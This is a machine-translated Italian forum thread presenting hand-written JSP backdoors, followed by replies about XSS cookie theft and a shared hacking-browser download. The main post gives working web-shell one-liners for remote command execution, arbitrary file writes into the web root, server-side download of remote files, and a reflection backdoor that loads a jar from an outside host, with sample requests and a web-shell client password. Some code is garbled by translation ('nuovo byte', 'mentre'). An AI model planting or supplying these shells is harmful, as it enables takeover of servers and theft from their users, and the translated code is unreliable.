Questo articolo è un articolo speculare di traduzione automatica, clicca qui per saltare all'articolo originale.

Vista: 14991|Risposta: 7

[Strumenti di Sicurezza] Backdoor JSP scritto a mano

[Copiato link]
Pubblicato su 02/01/2015 18:46:57 | | | |
Trasferito da: http://p2j.cn/?p=1627
1. Eseguire comandi di sistema:
Eseguire comandi di sistema senza eco:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Richiesta: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Non ci sarà eco dopo l'esecuzione, il che è molto comodo per i rimbalzanti shell.
Ci sono echi con la verifica della password:
<% if("023".equals(request.getParameter"pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = nuovo byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Richiesta: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Codifica la stringa e scrivila nel file specificato:
1:
<%new java.io.FileOutputStream(request.getParameter("f").write(request.getParameter("c").getBytes());%>
Richiesta: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Scrivi nella directory web:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f").write(request.getParameter("c").getBytes();%>
Richiesta: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Richiesta: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Scrivi nella directory web:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Richiesta: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Scarica il file remoto (se non usi Apache-io utili, non puoi convertire il flusso di input in byte, quindi è molto lungo...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u").openStream();    byte[] b = nuovo byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    mentre ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Richiesta: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Scarica sul percorso web:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u").openStream();    byte[] b = nuovo byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    mentre ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Richiesta: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Quattro: Reflection chiama il barattolo esterno, perfeziona la porta sul retro
Se non ti piace che la funzione backdoor sopra sopra sia troppo debole e superata, puoi provare questa:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter(u"))}).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Richiesta: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Connessione coltello da cucina: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, password 023.

Soluzione:
Usa la riflessione per caricare un jar esterno nell'applicazione corrente, e la riflessione esegue il risultato di elaborazione in uscita. request.getParameterMap() contiene tutti i parametri richiesti. Poiché il pacchetto jar esterno è caricato, il server deve essere in grado di accedere a questo indirizzo jar.




Precedente:La crisi dietro il file di testo TXT
Prossimo:Crittografia Java MD5, cifratura e decrittografia Base64 Java esegue il codice sorgente dei comandi di sistema
Pubblicato su 02/01/2015 20:17:30 |
Hai recentemente fatto ricerche sulla backdoor di JSP?
 Padrone di casa| Pubblicato su 02/01/2015 20:39:44 |
admin pubblicato il 2015-1-2 20:17
Hai recentemente fatto ricerche sulla backdoor di JSP?

Hai mai visto JSP in una sola frase? L'ho trovato, non l'ho studiato a fondo, non capivo xss, finalmente ho ricevuto i cookie ieri e non so come modificare il caricamento dei cookie
Pubblicato su 02/01/2015 20:44:40 |
Delver_Si Pubblicato il 2015-1-2 20:39
Hai mai visto JSP in una sola frase? L'ho trovato, non ho scavato più a fondo, non ho capito xss, finalmente ho preso i biscotti ieri, non so come modificare la cucina...

Non saranno i miei biscotti rubati con un file di firma personalizzato,,,

Usa il plugin HackBar di Firefox
Pubblicato su 02/01/2015 20:48:57 |
Delver_Si Pubblicato il 2015-1-2 20:39
Hai mai visto JSP in una sola frase? L'ho trovato, non ho scavato più a fondo, non ho capito xss, finalmente ho preso i biscotti ieri, non so come modificare la cucina...

Ghost Brother Browser Multifunzionale v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Numero di download: 7, Prezzo di vendita: 1 Grain MB)
 Padrone di casa| Pubblicato su 02/01/2015 20:57:50 |
admin pubblicato il 2015-1-2 20:44
Non saranno i miei biscotti rubati con un file di firma personalizzato,,,

Usa il plugin HackBar di Firefox

Ieri, la porta libera era convulsiva, non riuscivo a connettermi e non riuscivo ad entrare nello store di Firefox.
 Padrone di casa| Pubblicato su 02/01/2015 20:59:01 |
admin pubblicato il 2015-1-2 20:44
Non saranno i miei biscotti rubati con un file di firma personalizzato,,,

Usa il plugin HackBar di Firefox

DZ non ha questa scappatoia
Pubblicato su 02/01/2015 21:00:22 |
Delver_Si Pubblicato il 2015-1-2 20:59
DZ non ha questa scappatoia

Non lo so, puoi testarlo, non rovinare il mio database   

Tutti noi usiamo Tor Browser per aggirare il muro

Disconoscimento:
Tutto il software, i materiali di programmazione o gli articoli pubblicati dalla Code Farmer Network sono destinati esclusivamente all'apprendimento e alla ricerca; I contenuti sopra elencati non devono essere utilizzati per scopi commerciali o illegali, altrimenti gli utenti dovranno sostenere tutte le conseguenze. Le informazioni su questo sito provengono da Internet, e le controversie sul copyright non hanno nulla a che fare con questo sito. Devi eliminare completamente i contenuti sopra elencati dal tuo computer entro 24 ore dal download. Se ti piace il programma, ti preghiamo di supportare software autentico, acquistare la registrazione e ottenere servizi autentici migliori. In caso di violazione, vi preghiamo di contattarci via email.

Mail To:help@itsvse.com